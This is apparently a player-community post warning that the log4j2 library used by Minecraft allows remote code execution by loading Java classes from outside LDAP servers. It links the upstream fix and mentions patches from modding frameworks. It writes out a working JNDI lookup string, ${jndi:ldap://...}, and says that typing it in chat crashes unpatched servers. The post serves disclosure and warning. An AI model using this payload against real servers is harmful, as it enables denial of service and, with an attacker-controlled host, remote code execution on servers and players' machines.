Massive Remote Code Execution vulnerability

Anyone connected to a server can execute code in its players machines, and even in the server itself!

To make this quick, the log4j2 library (which Minecraft uses) has a massive vulnerability in that it trusts LDAP servers outside of the local network - downloading Java classes and executing them. Source: https://github.com/apache/logging-log4j2/pull/608

The simplest test that can be done is crashing ANY unpatched Minecraft server by typing in the game chat the following text: ${jndi:ldap://1.1.1.1}, the game will try to load a class from 1.1.1.1 but as it's a DNS server (thus invalid for LDAP), it will just crash.

https://media.discordapp.net/attachments/754673481987129394/918673980519501844/unknown.png

Multiple modding frameworks released patches today, doing input validation before logging chat messages.